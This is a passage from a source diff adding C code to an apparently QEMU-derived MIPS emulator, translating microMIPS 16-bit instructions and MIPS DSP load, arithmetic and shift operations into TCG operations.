gen_arith_imm(ctx, OPC_ADDIU, re, rt, 0); + } + break; + case LBU16: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4); + offset = (offset == 0xf ? -1 : offset); + + gen_ld(ctx, OPC_LBU, rd, rb, offset); + } + break; + case LHU16: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4) << 1; + + gen_ld(ctx, OPC_LHU, rd, rb, offset); + } + break; + case LWSP16: + { + int rd = (ctx->opcode >> 5) & 0x1f; + int rb = 29; /* SP */ + int16_t offset = ZIMM(ctx->opcode, 0, 5) << 2; + + gen_ld(ctx, OPC_LW, rd, rb, offset); + } + break; + case LW16: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4) << 2; + + gen_ld(ctx, OPC_LW, rd, rb, offset); + } + break; + case SB16: + { + int rd = mmreg2(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4); + + gen_st(ctx, OPC_SB, rd, rb, offset); + } + break; + case SH16: + { + int rd = mmreg2(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4) << 1; + + gen_st(ctx, OPC_SH, rd, rb, offset); + } + break; + case SWSP16: + { + int rd = (ctx->opcode >> 5) & 0x1f; + int rb = 29; /* SP */ + int16_t offset = ZIMM(ctx->opcode, 0, 5) << 2; + + gen_st(ctx, OPC_SW, rd, rb, offset); + } + break; + case SW16: + { + int rd = mmreg2(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4) << 2; + + gen_st(ctx, OPC_SW, rd, rb, offset); + } + break; + case MOVE16: + { + int rd = uMIPS_RD5(ctx->opcode); + int rs = uMIPS_RS5(ctx->opcode); + + gen_arith_imm(ctx, OPC_ADDIU, rd, rs, 0); + } + break; + case ANDI16: + gen_andi16(ctx); + break; + case POOL16D: + switch (ctx->opcode & 0x1) { + case ADDIUS5: + gen_addius5(ctx); + break; + case ADDIUSP: + gen_addiusp(ctx); + 
break; + } + break; + case POOL16E: + switch (ctx->opcode & 0x1) { + case ADDIUR2: + gen_addiur2(ctx); + break; + case ADDIUR1SP: + gen_addiur1sp(ctx); + break; + } + break; + case B16: + gen_compute_branch(ctx, OPC_BEQ, 2, 0, 0, + SIMM(ctx->opcode, 0, 10) << 1, 4); + break; + case BNEZ16: + case BEQZ16: + gen_compute_branch(ctx, op == BNEZ16 ? OPC_BNE : OPC_BEQ, 2, + mmreg(uMIPS_RD(ctx->opcode)), + 0, SIMM(ctx->opcode, 0, 7) << 1, 4); + break; + case LI16: + { + int reg = mmreg(uMIPS_RD(ctx->opcode)); + int imm = ZIMM(ctx->opcode, 0, 7); + + imm = (imm == 0x7f ? -1 : imm); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[reg], imm); + } + break; + case RES_20: + case RES_28: + case RES_29: + case RES_30: + case RES_31: + case RES_38: + case RES_39: + generate_exception(ctx, EXCP_RI); + break; + default: + decode_micromips32_opc (env, ctx, op); + return 4; + } + + return 2; +} + +/* SmartMIPS extension to MIPS32 */ + +#if defined(TARGET_MIPS64) + +/* MDMX extension to MIPS64 */ + +#endif + +/* MIPSDSP functions. 
*/ +static void gen_mipsdsp_ld(DisasContext *ctx, uint32_t opc, + int rd, int base, int offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "ldx"; + TCGv t0; + + check_dsp(ctx); + t0 = tcg_temp_new(tcg_ctx); + + if (base == 0) { + gen_load_gpr(ctx, t0, offset); + } else if (offset == 0) { + gen_load_gpr(ctx, t0, base); + } else { + gen_op_addr_add(ctx, t0, *cpu_gpr[base], *cpu_gpr[offset]); + } + + switch (opc) { + case OPC_LBUX: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_UB); + gen_store_gpr(tcg_ctx, t0, rd); + opn = "lbux"; + break; + case OPC_LHX: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESW); + gen_store_gpr(tcg_ctx, t0, rd); + opn = "lhx"; + break; + case OPC_LWX: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t0, rd); + opn = "lwx"; + break; +#if defined(TARGET_MIPS64) + case OPC_LDX: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ); + gen_store_gpr(tcg_ctx, t0, rd); + opn = "ldx"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s(%s)", opn, + regnames[rd], regnames[offset], regnames[base]); + tcg_temp_free(tcg_ctx, t0); +} + +static void gen_mipsdsp_arith(DisasContext *ctx, uint32_t op1, uint32_t op2, + int ret, int v1, int v2) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp arith"; + TCGv v1_t; + TCGv v2_t; + + if (ret == 0) { + /* Treat as NOP. 
*/ + MIPS_DEBUG("NOP"); + return; + } + + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (op1) { + /* OPC_MULT_G_2E is equal OPC_ADDUH_QB_DSP */ + case OPC_MULT_G_2E: + check_dspr2(ctx); + switch (op2) { + case OPC_ADDUH_QB: + gen_helper_adduh_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDUH_R_QB: + gen_helper_adduh_r_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQH_PH: + gen_helper_addqh_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQH_R_PH: + gen_helper_addqh_r_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQH_W: + gen_helper_addqh_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQH_R_W: + gen_helper_addqh_r_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBUH_QB: + gen_helper_subuh_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBUH_R_QB: + gen_helper_subuh_r_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBQH_PH: + gen_helper_subqh_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBQH_R_PH: + gen_helper_subqh_r_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBQH_W: + gen_helper_subqh_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBQH_R_W: + gen_helper_subqh_r_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + } + break; + case OPC_ABSQ_S_PH_DSP: + switch (op2) { + case OPC_ABSQ_S_QB: + check_dspr2(ctx); + gen_helper_absq_s_qb(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_ABSQ_S_PH: + check_dsp(ctx); + gen_helper_absq_s_ph(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_ABSQ_S_W: + check_dsp(ctx); + gen_helper_absq_s_w(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_PRECEQ_W_PHL: + check_dsp(ctx); + tcg_gen_andi_tl(tcg_ctx, *cpu_gpr[ret], v2_t, 0xFFFF0000); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret]); + break; + case OPC_PRECEQ_W_PHR: + 
check_dsp(ctx); + tcg_gen_andi_tl(tcg_ctx, *cpu_gpr[ret], v2_t, 0x0000FFFF); + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], 16); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret]); + break; + case OPC_PRECEQU_PH_QBL: + check_dsp(ctx); + gen_helper_precequ_ph_qbl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_PH_QBR: + check_dsp(ctx); + gen_helper_precequ_ph_qbr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_PH_QBLA: + check_dsp(ctx); + gen_helper_precequ_ph_qbla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_PH_QBRA: + check_dsp(ctx); + gen_helper_precequ_ph_qbra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_PH_QBL: + check_dsp(ctx); + gen_helper_preceu_ph_qbl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_PH_QBR: + check_dsp(ctx); + gen_helper_preceu_ph_qbr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_PH_QBLA: + check_dsp(ctx); + gen_helper_preceu_ph_qbla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_PH_QBRA: + check_dsp(ctx); + gen_helper_preceu_ph_qbra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + } + break; + case OPC_ADDU_QB_DSP: + switch (op2) { + case OPC_ADDQ_PH: + check_dsp(ctx); + gen_helper_addq_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_S_PH: + check_dsp(ctx); + gen_helper_addq_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_S_W: + check_dsp(ctx); + gen_helper_addq_s_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_QB: + check_dsp(ctx); + gen_helper_addu_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_S_QB: + check_dsp(ctx); + gen_helper_addu_s_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_PH: + check_dspr2(ctx); + gen_helper_addu_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_S_PH: + check_dspr2(ctx); + gen_helper_addu_s_ph(tcg_ctx, 
*cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_PH: + check_dsp(ctx); + gen_helper_subq_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_S_PH: + check_dsp(ctx); + gen_helper_subq_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_S_W: + check_dsp(ctx); + gen_helper_subq_s_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_QB: + check_dsp(ctx); + gen_helper_subu_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_S_QB: + check_dsp(ctx); + gen_helper_subu_s_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_PH: + check_dspr2(ctx); + gen_helper_subu_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_S_PH: + check_dspr2(ctx); + gen_helper_subu_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDSC: + check_dsp(ctx); + gen_helper_addsc(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDWC: + check_dsp(ctx); + gen_helper_addwc(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MODSUB: + check_dsp(ctx); + gen_helper_modsub(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_RADDU_W_QB: + check_dsp(ctx); + gen_helper_raddu_w_qb(tcg_ctx, *cpu_gpr[ret], v1_t); + break; + } + break; + case OPC_CMPU_EQ_QB_DSP: + switch (op2) { + case OPC_PRECR_QB_PH: + check_dspr2(ctx); + gen_helper_precr_qb_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECRQ_QB_PH: + check_dsp(ctx); + gen_helper_precrq_qb_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECR_SRA_PH_W: + check_dspr2(ctx); + { + TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, v2); + gen_helper_precr_sra_ph_w(tcg_ctx, *cpu_gpr[ret], sa_t, v1_t, + *cpu_gpr[ret]); + tcg_temp_free_i32(tcg_ctx, sa_t); + break; + } + case OPC_PRECR_SRA_R_PH_W: + check_dspr2(ctx); + { + TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, v2); + 
gen_helper_precr_sra_r_ph_w(tcg_ctx, *cpu_gpr[ret], sa_t, v1_t, + *cpu_gpr[ret]); + tcg_temp_free_i32(tcg_ctx, sa_t); + break; + } + case OPC_PRECRQ_PH_W: + check_dsp(ctx); + gen_helper_precrq_ph_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECRQ_RS_PH_W: + check_dsp(ctx); + gen_helper_precrq_rs_ph_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PRECRQU_S_QB_PH: + check_dsp(ctx); + gen_helper_precrqu_s_qb_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_ABSQ_S_QH_DSP: + switch (op2) { + case OPC_PRECEQ_L_PWL: + check_dsp(ctx); + tcg_gen_andi_tl(tcg_ctx, *cpu_gpr[ret], v2_t, 0xFFFFFFFF00000000ull); + break; + case OPC_PRECEQ_L_PWR: + check_dsp(ctx); + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[ret], v2_t, 32); + break; + case OPC_PRECEQ_PW_QHL: + check_dsp(ctx); + gen_helper_preceq_pw_qhl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQ_PW_QHR: + check_dsp(ctx); + gen_helper_preceq_pw_qhr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQ_PW_QHLA: + check_dsp(ctx); + gen_helper_preceq_pw_qhla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQ_PW_QHRA: + check_dsp(ctx); + gen_helper_preceq_pw_qhra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_QH_OBL: + check_dsp(ctx); + gen_helper_precequ_qh_obl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_QH_OBR: + check_dsp(ctx); + gen_helper_precequ_qh_obr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_QH_OBLA: + check_dsp(ctx); + gen_helper_precequ_qh_obla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_QH_OBRA: + check_dsp(ctx); + gen_helper_precequ_qh_obra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_QH_OBL: + check_dsp(ctx); + gen_helper_preceu_qh_obl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_QH_OBR: + check_dsp(ctx); + gen_helper_preceu_qh_obr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_QH_OBLA: + check_dsp(ctx); + 
gen_helper_preceu_qh_obla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_QH_OBRA: + check_dsp(ctx); + gen_helper_preceu_qh_obra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_ABSQ_S_OB: + check_dspr2(ctx); + gen_helper_absq_s_ob(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_ABSQ_S_PW: + check_dsp(ctx); + gen_helper_absq_s_pw(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_ABSQ_S_QH: + check_dsp(ctx); + gen_helper_absq_s_qh(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + } + break; + case OPC_ADDU_OB_DSP: + switch (op2) { + case OPC_RADDU_L_OB: + check_dsp(ctx); + gen_helper_raddu_l_ob(tcg_ctx, *cpu_gpr[ret], v1_t); + break; + case OPC_SUBQ_PW: + check_dsp(ctx); + gen_helper_subq_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_S_PW: + check_dsp(ctx); + gen_helper_subq_s_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_QH: + check_dsp(ctx); + gen_helper_subq_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_S_QH: + check_dsp(ctx); + gen_helper_subq_s_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_OB: + check_dsp(ctx); + gen_helper_subu_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_S_OB: + check_dsp(ctx); + gen_helper_subu_s_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_QH: + check_dspr2(ctx); + gen_helper_subu_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_S_QH: + check_dspr2(ctx); + gen_helper_subu_s_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBUH_OB: + check_dspr2(ctx); + gen_helper_subuh_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBUH_R_OB: + check_dspr2(ctx); + gen_helper_subuh_r_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQ_PW: + check_dsp(ctx); + gen_helper_addq_pw(tcg_ctx, 
*cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_S_PW: + check_dsp(ctx); + gen_helper_addq_s_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_QH: + check_dsp(ctx); + gen_helper_addq_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_S_QH: + check_dsp(ctx); + gen_helper_addq_s_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_OB: + check_dsp(ctx); + gen_helper_addu_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_S_OB: + check_dsp(ctx); + gen_helper_addu_s_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_QH: + check_dspr2(ctx); + gen_helper_addu_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_S_QH: + check_dspr2(ctx); + gen_helper_addu_s_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDUH_OB: + check_dspr2(ctx); + gen_helper_adduh_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDUH_R_OB: + check_dspr2(ctx); + gen_helper_adduh_r_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + } + break; + case OPC_CMPU_EQ_OB_DSP: + switch (op2) { + case OPC_PRECR_OB_QH: + check_dspr2(ctx); + gen_helper_precr_ob_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECR_SRA_QH_PW: + check_dspr2(ctx); + { + TCGv_i32 ret_t = tcg_const_i32(tcg_ctx, ret); + gen_helper_precr_sra_qh_pw(tcg_ctx, v2_t, v1_t, v2_t, ret_t); + tcg_temp_free_i32(tcg_ctx, ret_t); + break; + } + case OPC_PRECR_SRA_R_QH_PW: + check_dspr2(ctx); + { + TCGv_i32 sa_v = tcg_const_i32(tcg_ctx, ret); + gen_helper_precr_sra_r_qh_pw(tcg_ctx, v2_t, v1_t, v2_t, sa_v); + tcg_temp_free_i32(tcg_ctx, sa_v); + break; + } + case OPC_PRECRQ_OB_QH: + check_dsp(ctx); + gen_helper_precrq_ob_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECRQ_PW_L: + check_dsp(ctx); + gen_helper_precrq_pw_l(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case 
OPC_PRECRQ_QH_PW: + check_dsp(ctx); + gen_helper_precrq_qh_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECRQ_RS_QH_PW: + check_dsp(ctx); + gen_helper_precrq_rs_qh_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PRECRQU_S_OB_QH: + check_dsp(ctx); + gen_helper_precrqu_s_ob_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#endif + } + + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_shift(DisasContext *ctx, uint32_t opc, + int ret, int v1, int v2) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + uint32_t op2; + const char *opn = "mipsdsp shift"; + TCGv t0; + TCGv v1_t; + TCGv v2_t; + + if (ret == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + tcg_gen_movi_tl(tcg_ctx, t0, v1); + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (opc) { + case OPC_SHLL_QB_DSP: + { + op2 = MASK_SHLL_QB(ctx->opcode); + switch (op2) { + case OPC_SHLL_QB: + check_dsp(ctx); + gen_helper_shll_qb(tcg_ctx, *cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_QB: + check_dsp(ctx); + gen_helper_shll_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_PH: + check_dsp(ctx); + gen_helper_shll_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_PH: + check_dsp(ctx); + gen_helper_shll_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_S_PH: + check_dsp(ctx); + gen_helper_shll_s_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_S_PH: + check_dsp(ctx); + gen_helper_shll_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_S_W: + check_dsp(ctx); + 
gen_helper_shll_s_w(tcg_ctx, *cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_S_W: + check_dsp(ctx); + gen_helper_shll_s_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHRL_QB: + check_dsp(ctx); + gen_helper_shrl_qb(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRLV_QB: + check_dsp(ctx); + gen_helper_shrl_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRL_PH: + check_dspr2(ctx); + gen_helper_shrl_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRLV_PH: + check_dspr2(ctx); + gen_helper_shrl_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRA_QB: + check_dspr2(ctx); + gen_helper_shra_qb(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRA_R_QB: + check_dspr2(ctx); + gen_helper_shra_r_qb(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRAV_QB: + check_dspr2(ctx); + gen_helper_shra_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRAV_R_QB: + check_dspr2(ctx); + gen_helper_shra_r_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRA_PH: + check_dsp(ctx); + gen_helper_shra_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRA_R_PH: + check_dsp(ctx); + gen_helper_shra_r_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRAV_PH: + check_dsp(ctx); + gen_helper_shra_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRAV_R_PH: + check_dsp(ctx); + gen_helper_shra_r_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRA_R_W: + check_dsp(ctx); + gen_helper_shra_r_w(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRAV_R_W: + check_dsp(ctx); + gen_helper_shra_r_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + default: /* Invalid */ + MIPS_INVAL("MASK SHLL.QB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + } +#ifdef TARGET_MIPS64 + case OPC_SHLL_OB_DSP: + op2 = MASK_SHLL_OB(ctx->opcode); + switch (op2) { + case OPC_SHLL_PW: + check_dsp(ctx); + gen_helper_shll_pw(tcg_ctx, 
*cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_PW: + check_dsp(ctx); + gen_helper_shll_pw(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_S_PW: + check_dsp(ctx); + gen_helper_shll_s_pw(tcg_ctx, *cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_S_PW: + check_dsp(ctx); + gen_helper_shll_s_pw(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_OB: + check_dsp(ctx); + gen_helper_shll_ob(tcg_ctx, *cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_OB: + check_dsp(ctx); + gen_helper_shll_ob(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_QH: + check_dsp(ctx); + gen_helper_shll_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_QH: + check_dsp(ctx); + gen_helper_shll_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_S_QH: + check_dsp(ctx); + gen_helper_shll_s_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_S_QH: + check_dsp(ctx); + gen_helper_shll_s_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHRA_OB: + check_dspr2(ctx); + gen_helper_shra_ob(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_OB: + check_dspr2(ctx); + gen_helper_shra_ob(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_R_OB: + check_dspr2(ctx); + gen_helper_shra_r_ob(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_R_OB: + check_dspr2(ctx); + gen_helper_shra_r_ob(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_PW: + check_dsp(ctx); + gen_helper_shra_pw(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case 